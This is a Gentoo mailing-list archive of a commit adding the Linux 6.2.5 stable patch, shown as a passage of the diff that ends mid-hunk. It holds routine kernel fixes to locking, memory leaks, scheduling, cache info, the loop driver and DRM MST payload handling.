public inbox for gentoo-commits@lists.gentoo.org
 help / color / mirror / Atom feed
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-11 14:08 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-11 14:08 UTC (permalink / raw
  To: gentoo-commits

commit:     73f2a0ff690a7eb9e825a0e00c0cccfdd84f0741
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 14:08:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 14:08:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=73f2a0ff

Linux patch 6.2.5

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |     4 +
 1004_linux-6.2.5.patch | 11655 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11659 insertions(+)

diff --git a/0000_README b/0000_README
index f3f521f1..2cb9b328 100644
--- a/0000_README
+++ b/0000_README
@@ -59,6 +59,10 @@ Patch:  1003_linux-6.2.4.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.4
 
+Patch:  1004_linux-6.2.5.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.5
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1004_linux-6.2.5.patch b/1004_linux-6.2.5.patch
new file mode 100644
index 00000000..4795d2a1
--- /dev/null
+++ b/1004_linux-6.2.5.patch
@@ -0,0 +1,11655 @@
+diff --git a/Documentation/ABI/testing/configfs-usb-gadget-uvc b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+index f00cff6d8c5cb..c25cc2823fc8f 100644
+--- a/Documentation/ABI/testing/configfs-usb-gadget-uvc
++++ b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+@@ -52,7 +52,7 @@ Date:		Dec 2014
+ KernelVersion:	4.0
+ Description:	Default output terminal descriptors
+ 
+-		All attributes read only:
++		All attributes read only except bSourceID:
+ 
+ 		==============	=============================================
+ 		iTerminal	index of string descriptor
+diff --git a/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml b/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml
+index a9f831448ccae..cc4cf92b70d18 100644
+--- a/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml
++++ b/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml
+@@ -16,6 +16,7 @@ properties:
+   compatible:
+     enum:
+       - usb5e3,608
++      - usb5e3,610
+ 
+   reg: true
+ 
+diff --git a/Makefile b/Makefile
+index 83cbbc3adbb12..1a1d63f2a9edb 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 4
++SUBLEVEL = 5
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts
+index 7f755e5a4624d..d9b684ccb0956 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts
+@@ -124,7 +124,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+index 1448ea895be43..8ad5fe9c29900 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+@@ -244,7 +244,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+index 20ef958698ec7..a3c55a0cc833e 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+@@ -220,7 +220,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/spear320-hmi.dts b/arch/arm/boot/dts/spear320-hmi.dts
+index 34503ac9c51c2..721e5ee7b6803 100644
+--- a/arch/arm/boot/dts/spear320-hmi.dts
++++ b/arch/arm/boot/dts/spear320-hmi.dts
+@@ -241,7 +241,7 @@
+ 					irq-trigger = <0x1>;
+ 
+ 					stmpegpio: stmpe-gpio {
+-						compatible = "stmpe,gpio";
++						compatible = "st,stmpe-gpio";
+ 						reg = <0>;
+ 						gpio-controller;
+ 						#gpio-cells = <2>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index de4ff90785b2c..4801b5e176c18 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -33,7 +33,7 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ ({									\
+ 	efi_virtmap_load();						\
+ 	__efi_fpsimd_begin();						\
+-	spin_lock(&efi_rt_lock);					\
++	raw_spin_lock(&efi_rt_lock);					\
+ })
+ 
+ #undef arch_efi_call_virt
+@@ -42,12 +42,12 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ 
+ #define arch_efi_call_virt_teardown()					\
+ ({									\
+-	spin_unlock(&efi_rt_lock);					\
++	raw_spin_unlock(&efi_rt_lock);					\
+ 	__efi_fpsimd_end();						\
+ 	efi_virtmap_unload();						\
+ })
+ 
+-extern spinlock_t efi_rt_lock;
++extern raw_spinlock_t efi_rt_lock;
+ extern u64 *efi_rt_stack_top;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index b273900f45668..a30dbe4b95cd3 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -146,7 +146,7 @@ asmlinkage efi_status_t efi_handle_corrupted_x18(efi_status_t s, const char *f)
+ 	return s;
+ }
+ 
+-DEFINE_SPINLOCK(efi_rt_lock);
++DEFINE_RAW_SPINLOCK(efi_rt_lock);
+ 
+ asmlinkage u64 *efi_rt_stack_top __ro_after_init;
+ 
+diff --git a/arch/mips/configs/mtx1_defconfig b/arch/mips/configs/mtx1_defconfig
+index 89a1511d2ee47..edf9634aa8ee1 100644
+--- a/arch/mips/configs/mtx1_defconfig
++++ b/arch/mips/configs/mtx1_defconfig
+@@ -284,6 +284,7 @@ CONFIG_IXGB=m
+ CONFIG_SKGE=m
+ CONFIG_SKY2=m
+ CONFIG_MYRI10GE=m
++CONFIG_FEALNX=m
+ CONFIG_NATSEMI=m
+ CONFIG_NS83820=m
+ CONFIG_S2IO=m
+diff --git a/arch/powerpc/configs/ppc6xx_defconfig b/arch/powerpc/configs/ppc6xx_defconfig
+index 1102582779599..f73c98be56c8f 100644
+--- a/arch/powerpc/configs/ppc6xx_defconfig
++++ b/arch/powerpc/configs/ppc6xx_defconfig
+@@ -461,6 +461,7 @@ CONFIG_MV643XX_ETH=m
+ CONFIG_SKGE=m
+ CONFIG_SKY2=m
+ CONFIG_MYRI10GE=m
++CONFIG_FEALNX=m
+ CONFIG_NATSEMI=m
+ CONFIG_NS83820=m
+ CONFIG_PCMCIA_AXNET=m
+diff --git a/arch/um/drivers/vector_kern.c b/arch/um/drivers/vector_kern.c
+index ded7c47d2fbe5..131b7cb295767 100644
+--- a/arch/um/drivers/vector_kern.c
++++ b/arch/um/drivers/vector_kern.c
+@@ -767,6 +767,7 @@ static int vector_config(char *str, char **error_out)
+ 
+ 	if (parsed == NULL) {
+ 		*error_out = "vector_config failed to parse parameters";
++		kfree(params);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/arch/um/drivers/virt-pci.c b/arch/um/drivers/virt-pci.c
+index 3ac220dafec4a..5472b1a0a0398 100644
+--- a/arch/um/drivers/virt-pci.c
++++ b/arch/um/drivers/virt-pci.c
+@@ -132,8 +132,11 @@ static int um_pci_send_cmd(struct um_pci_device *dev,
+ 				out ? 1 : 0,
+ 				posted ? cmd : HANDLE_NO_FREE(cmd),
+ 				GFP_ATOMIC);
+-	if (ret)
++	if (ret) {
++		if (posted)
++			kfree(cmd);
+ 		goto out;
++	}
+ 
+ 	if (posted) {
+ 		virtqueue_kick(dev->cmd_vq);
+@@ -623,22 +626,33 @@ static void um_pci_virtio_remove(struct virtio_device *vdev)
+ 	struct um_pci_device *dev = vdev->priv;
+ 	int i;
+ 
+-        /* Stop all virtqueues */
+-        virtio_reset_device(vdev);
+-        vdev->config->del_vqs(vdev);
+-
+ 	device_set_wakeup_enable(&vdev->dev, false);
+ 
+ 	mutex_lock(&um_pci_mtx);
+ 	for (i = 0; i < MAX_DEVICES; i++) {
+ 		if (um_pci_devices[i].dev != dev)
+ 			continue;
++
+ 		um_pci_devices[i].dev = NULL;
+ 		irq_free_desc(dev->irq);
++
++		break;
+ 	}
+ 	mutex_unlock(&um_pci_mtx);
+ 
+-	um_pci_rescan();
++	if (i < MAX_DEVICES) {
++		struct pci_dev *pci_dev;
++
++		pci_dev = pci_get_slot(bridge->bus, i);
++		if (pci_dev)
++			pci_stop_and_remove_bus_device_locked(pci_dev);
++	}
++
++	/* Stop all virtqueues */
++	virtio_reset_device(vdev);
++	dev->cmd_vq = NULL;
++	dev->irq_vq = NULL;
++	vdev->config->del_vqs(vdev);
+ 
+ 	kfree(dev);
+ }
+diff --git a/arch/um/drivers/virtio_uml.c b/arch/um/drivers/virtio_uml.c
+index 588930a0ced17..ddd080f6dd82e 100644
+--- a/arch/um/drivers/virtio_uml.c
++++ b/arch/um/drivers/virtio_uml.c
+@@ -168,7 +168,8 @@ static void vhost_user_check_reset(struct virtio_uml_device *vu_dev,
+ 	if (!vu_dev->registered)
+ 		return;
+ 
+-	virtio_break_device(&vu_dev->vdev);
++	vu_dev->registered = 0;
++
+ 	schedule_work(&pdata->conn_broken_wk);
+ }
+ 
+@@ -1136,6 +1137,15 @@ void virtio_uml_set_no_vq_suspend(struct virtio_device *vdev,
+ 
+ static void vu_of_conn_broken(struct work_struct *wk)
+ {
++	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
++
++	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	/*
+ 	 * We can't remove the device from the devicetree so the only thing we
+ 	 * can do is warn.
+@@ -1266,8 +1276,14 @@ static int vu_unregister_cmdline_device(struct device *dev, void *data)
+ static void vu_conn_broken(struct work_struct *wk)
+ {
+ 	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
+ 
+ 	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	vu_unregister_cmdline_device(&pdata->pdev->dev, NULL);
+ }
+ 
+diff --git a/arch/x86/include/asm/resctrl.h b/arch/x86/include/asm/resctrl.h
+index 52788f79786fa..255a78d9d9067 100644
+--- a/arch/x86/include/asm/resctrl.h
++++ b/arch/x86/include/asm/resctrl.h
+@@ -49,7 +49,7 @@ DECLARE_STATIC_KEY_FALSE(rdt_mon_enable_key);
+  *   simple as possible.
+  * Must be called with preemption disabled.
+  */
+-static void __resctrl_sched_in(void)
++static inline void __resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	struct resctrl_pqr_state *state = this_cpu_ptr(&pqr_state);
+ 	u32 closid = state->default_closid;
+@@ -61,13 +61,13 @@ static void __resctrl_sched_in(void)
+ 	 * Else use the closid/rmid assigned to this cpu.
+ 	 */
+ 	if (static_branch_likely(&rdt_alloc_enable_key)) {
+-		tmp = READ_ONCE(current->closid);
++		tmp = READ_ONCE(tsk->closid);
+ 		if (tmp)
+ 			closid = tmp;
+ 	}
+ 
+ 	if (static_branch_likely(&rdt_mon_enable_key)) {
+-		tmp = READ_ONCE(current->rmid);
++		tmp = READ_ONCE(tsk->rmid);
+ 		if (tmp)
+ 			rmid = tmp;
+ 	}
+@@ -88,17 +88,17 @@ static inline unsigned int resctrl_arch_round_mon_val(unsigned int val)
+ 	return val * scale;
+ }
+ 
+-static inline void resctrl_sched_in(void)
++static inline void resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	if (static_branch_likely(&rdt_enable_key))
+-		__resctrl_sched_in();
++		__resctrl_sched_in(tsk);
+ }
+ 
+ void resctrl_cpu_detect(struct cpuinfo_x86 *c);
+ 
+ #else
+ 
+-static inline void resctrl_sched_in(void) {}
++static inline void resctrl_sched_in(struct task_struct *tsk) {}
+ static inline void resctrl_cpu_detect(struct cpuinfo_x86 *c) {}
+ 
+ #endif /* CONFIG_X86_CPU_RESCTRL */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 5993da21d8225..87b670d540b84 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -314,7 +314,7 @@ static void update_cpu_closid_rmid(void *info)
+ 	 * executing task might have its own closid selected. Just reuse
+ 	 * the context switch code.
+ 	 */
+-	resctrl_sched_in();
++	resctrl_sched_in(current);
+ }
+ 
+ /*
+@@ -535,7 +535,7 @@ static void _update_task_closid_rmid(void *task)
+ 	 * Otherwise, the MSR is updated when the task is scheduled in.
+ 	 */
+ 	if (task == current)
+-		resctrl_sched_in();
++		resctrl_sched_in(task);
+ }
+ 
+ static void update_task_closid_rmid(struct task_struct *t)
+diff --git a/arch/x86/kernel/process_32.c b/arch/x86/kernel/process_32.c
+index 470c128759eab..708c87b88cc15 100644
+--- a/arch/x86/kernel/process_32.c
++++ b/arch/x86/kernel/process_32.c
+@@ -212,7 +212,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	switch_fpu_finish();
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
+index 4e34b3b68ebdc..bb65a68b4b499 100644
+--- a/arch/x86/kernel/process_64.c
++++ b/arch/x86/kernel/process_64.c
+@@ -656,7 +656,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	}
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/um/vdso/um_vdso.c b/arch/x86/um/vdso/um_vdso.c
+index 2112b8d146688..ff0f3b4b6c45e 100644
+--- a/arch/x86/um/vdso/um_vdso.c
++++ b/arch/x86/um/vdso/um_vdso.c
+@@ -17,8 +17,10 @@ int __vdso_clock_gettime(clockid_t clock, struct __kernel_old_timespec *ts)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_clock_gettime), "D" (clock), "S" (ts) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_clock_gettime), "D" (clock), "S" (ts)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+@@ -29,8 +31,10 @@ int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_gettimeofday), "D" (tv), "S" (tz) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_gettimeofday), "D" (tv), "S" (tz)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/device_pm.c b/drivers/acpi/device_pm.c
+index 97450f4003cc9..f007116a84276 100644
+--- a/drivers/acpi/device_pm.c
++++ b/drivers/acpi/device_pm.c
+@@ -484,6 +484,25 @@ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev)
+ 	acpi_dev_for_each_child(adev, acpi_power_up_if_adr_present, NULL);
+ }
+ 
++/**
++ * acpi_dev_power_state_for_wake - Deepest power state for wakeup signaling
++ * @adev: ACPI companion of the target device.
++ *
++ * Evaluate _S0W for @adev and return the value produced by it or return
++ * ACPI_STATE_UNKNOWN on errors (including _S0W not present).
++ */
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev)
++{
++	unsigned long long state;
++	acpi_status status;
++
++	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
++	if (ACPI_FAILURE(status))
++		return ACPI_STATE_UNKNOWN;
++
++	return state;
++}
++
+ #ifdef CONFIG_PM
+ static DEFINE_MUTEX(acpi_pm_notifier_lock);
+ static DEFINE_MUTEX(acpi_pm_notifier_install_lock);
+diff --git a/drivers/auxdisplay/hd44780.c b/drivers/auxdisplay/hd44780.c
+index 8b2a0eb3f32a4..d56a5d508ccd7 100644
+--- a/drivers/auxdisplay/hd44780.c
++++ b/drivers/auxdisplay/hd44780.c
+@@ -322,8 +322,10 @@ fail1:
+ static int hd44780_remove(struct platform_device *pdev)
+ {
+ 	struct charlcd *lcd = platform_get_drvdata(pdev);
++	struct hd44780_common *hdc = lcd->drvdata;
+ 
+ 	charlcd_unregister(lcd);
++	kfree(hdc->hd44780);
+ 	kfree(lcd->drvdata);
+ 
+ 	kfree(lcd);
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index 950b22cdb5f7c..f05acf3c16c6b 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -256,7 +256,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ {
+ 	struct cpu_cacheinfo *this_cpu_ci = get_cpu_cacheinfo(cpu);
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int index;
++	unsigned int index, sib_index;
+ 	int ret = 0;
+ 
+ 	if (this_cpu_ci->cpu_map_populated)
+@@ -284,11 +284,13 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ 
+ 			if (i == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+-
+-			sib_leaf = per_cpu_cacheinfo_idx(i, index);
+-			if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+-				cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
+-				cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++			for (sib_index = 0; sib_index < cache_leaves(i); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(i, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++					break;
++				}
+ 			}
+ 		}
+ 		/* record the maximum cache line size */
+@@ -302,7 +304,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ {
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int sibling, index;
++	unsigned int sibling, index, sib_index;
+ 
+ 	for (index = 0; index < cache_leaves(cpu); index++) {
+ 		this_leaf = per_cpu_cacheinfo_idx(cpu, index);
+@@ -313,9 +315,14 @@ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ 			if (sibling == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+ 
+-			sib_leaf = per_cpu_cacheinfo_idx(sibling, index);
+-			cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
+-			cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++			for (sib_index = 0; sib_index < cache_leaves(sibling); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(sibling, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++					break;
++				}
++			}
+ 		}
+ 	}
+ }
+diff --git a/drivers/base/component.c b/drivers/base/component.c
+index 5eadeac6c5322..7dbf14a1d9157 100644
+--- a/drivers/base/component.c
++++ b/drivers/base/component.c
+@@ -125,7 +125,7 @@ static void component_debugfs_add(struct aggregate_device *m)
+ 
+ static void component_debugfs_del(struct aggregate_device *m)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(m->parent), component_debugfs_dir));
++	debugfs_lookup_and_remove(dev_name(m->parent), component_debugfs_dir);
+ }
+ 
+ #else
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index e9b2f9c25efe4..959fe018d0dd7 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -372,7 +372,7 @@ late_initcall(deferred_probe_initcall);
+ 
+ static void __exit deferred_probe_exit(void)
+ {
+-	debugfs_remove_recursive(debugfs_lookup("devices_deferred", NULL));
++	debugfs_lookup_and_remove("devices_deferred", NULL);
+ }
+ __exitcall(deferred_probe_exit);
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 1518a6423279b..1b35cbd029c7c 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -977,13 +977,13 @@ loop_set_status_from_info(struct loop_device *lo,
+ 		return -EINVAL;
+ 	}
+ 
++	/* Avoid assigning overflow values */
++	if (info->lo_offset > LLONG_MAX || info->lo_sizelimit > LLONG_MAX)
++		return -EOVERFLOW;
++
+ 	lo->lo_offset = info->lo_offset;
+ 	lo->lo_sizelimit = info->lo_sizelimit;
+ 
+-	/* loff_t vars have been assigned __u64 */
+-	if (lo->lo_offset < 0 || lo->lo_sizelimit < 0)
+-		return -EOVERFLOW;
+-
+ 	memcpy(lo->lo_file_name, info->lo_file_name, LO_NAME_SIZE);
+ 	lo->lo_file_name[LO_NAME_SIZE-1] = 0;
+ 	lo->lo_flags = info->lo_flags;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 9c42886818418..357c61c12ce5b 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -219,7 +219,7 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mutex_unlock(&mhi_chan->lock);
+ 		break;
+ 	case MHI_PKT_TYPE_RESET_CHAN_CMD:
+-		dev_dbg(dev, "Received STOP command for channel (%u)\n", ch_id);
++		dev_dbg(dev, "Received RESET command for channel (%u)\n", ch_id);
+ 		if (!ch_ring->started) {
+ 			dev_err(dev, "Channel (%u) not opened\n", ch_id);
+ 			return -ENODEV;
+diff --git a/drivers/cpufreq/apple-soc-cpufreq.c b/drivers/cpufreq/apple-soc-cpufreq.c
+index c11d22fd84c37..021f423705e1b 100644
+--- a/drivers/cpufreq/apple-soc-cpufreq.c
++++ b/drivers/cpufreq/apple-soc-cpufreq.c
+@@ -189,8 +189,8 @@ static int apple_soc_cpufreq_find_cluster(struct cpufreq_policy *policy,
+ 	*info = match->data;
+ 
+ 	*reg_base = of_iomap(args.np, 0);
+-	if (IS_ERR(*reg_base))
+-		return PTR_ERR(*reg_base);
++	if (!*reg_base)
++		return -ENOMEM;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index 7882d4b3f2be4..f06fdacc9bc83 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -264,6 +264,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"Lenovo ideapad D330-10IGM"),
+ 		},
+ 	},
++	{
++		/* Lenovo IdeaPad Duet 3 10IGL5 with 1200x1920 portrait screen */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION,
++					"IdeaPad Duet 3 10IGL5"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 5cff56bb8f560..657e7c7b59e98 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -206,7 +206,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	if (enable)
+ 		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+ 	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload);
++		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 4ca37261584a9..38dab76ae69ea 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3309,8 +3309,13 @@ int drm_dp_add_payload_part1(struct drm_dp_mst_topology_mgr *mgr,
+ 	int ret;
+ 
+ 	port = drm_dp_mst_topology_get_port_validated(mgr, payload->port);
+-	if (!port)
++	if (!port) {
++		drm_dbg_kms(mgr->dev,
++			    "VCPI %d for port %p not in topology, not creating a payload\n",
++			    payload->vcpi, payload->port);
++		payload->vc_start_slot = -1;
+ 		return 0;
++	}
+ 
+ 	if (mgr->payload_count == 0)
+ 		mgr->next_start_slot = mst_state->start_slot;
+@@ -3337,7 +3342,8 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  * drm_dp_remove_payload() - Remove an MST payload
+  * @mgr: Manager to use.
+  * @mst_state: The MST atomic state
+- * @payload: The payload to write
++ * @old_payload: The payload with its old state
++ * @new_payload: The payload to write
+  *
+  * Removes a payload from an MST topology if it was successfully assigned a start slot. Also updates
+  * the starting time slots of all other payloads which would have been shifted towards the start of
+@@ -3345,36 +3351,37 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  */
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload)
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload)
+ {
+ 	struct drm_dp_mst_atomic_payload *pos;
+ 	bool send_remove = false;
+ 
+ 	/* We failed to make the payload, so nothing to do */
+-	if (payload->vc_start_slot == -1)
++	if (new_payload->vc_start_slot == -1)
+ 		return;
+ 
+ 	mutex_lock(&mgr->lock);
+-	send_remove = drm_dp_mst_port_downstream_of_branch(payload->port, mgr->mst_primary);
++	send_remove = drm_dp_mst_port_downstream_of_branch(new_payload->port, mgr->mst_primary);
+ 	mutex_unlock(&mgr->lock);
+ 
+ 	if (send_remove)
+-		drm_dp_destroy_payload_step1(mgr, mst_state, payload);
++		drm_dp_destroy_payload_step1(mgr, mst_state, new_payload);
+ 	else
+ 		drm_dbg_kms(mgr->dev, "Payload for VCPI %d not in topology, not sending remove\n",
+-			    payload->vcpi);
++			    new_payload->vcpi);
+ 
+ 	list_for_each_entry(pos, &mst_state->payloads, next) {
+-		if (pos != payload && pos->vc_start_slot > payload->vc_start_slot)
+-			pos->vc_start_slot -= payload->time_slots;
++		if (pos != new_payload && pos->vc_start_slot > new_payload->vc_start_slot)
++			pos->vc_start_slot -= old_payload->time_slots;
+ 	}
+-	payload->vc_start_slot = -1;
++	new_payload->vc_start_slot = -1;
+ 
+ 	mgr->payload_count--;
+-	mgr->next_start_slot -= payload->time_slots;
++	mgr->next_start_slot -= old_payload->time_slots;
+ 
+-	if (payload->delete)
+-		drm_dp_mst_put_port_malloc(payload->port);
++	if (new_payload->delete)
++		drm_dp_mst_put_port_malloc(new_payload->port);
+ }
+ EXPORT_SYMBOL(drm_dp_remove_payload);
+ 
+@@ -3644,6 +3651,9 @@ int drm_dp_mst_topology_mgr_set_mst(struct drm_dp_mst_topology_mgr *mgr, bool ms
+ 		drm_dp_dpcd_writeb(mgr->aux, DP_MSTM_CTRL, 0);
+ 		ret = 0;
+ 		mgr->payload_id_table_cleared = false;
++
++		memset(&mgr->down_rep_recv, 0, sizeof(mgr->down_rep_recv));
++		memset(&mgr->up_req_recv, 0, sizeof(mgr->up_req_recv));
+ 	}
+ 
+ out_unlock:
+@@ -3856,7 +3866,7 @@ static int drm_dp_mst_handle_down_rep(struct drm_dp_mst_topology_mgr *mgr)
+ 	struct drm_dp_sideband_msg_rx *msg = &mgr->down_rep_recv;
+ 
+ 	if (!drm_dp_get_one_sb_msg(mgr, false, &mstb))
+-		goto out;
++		goto out_clear_reply;
+ 
+ 	/* Multi-packet message transmission, don't clear the reply */
+ 	if (!msg->have_eomt)
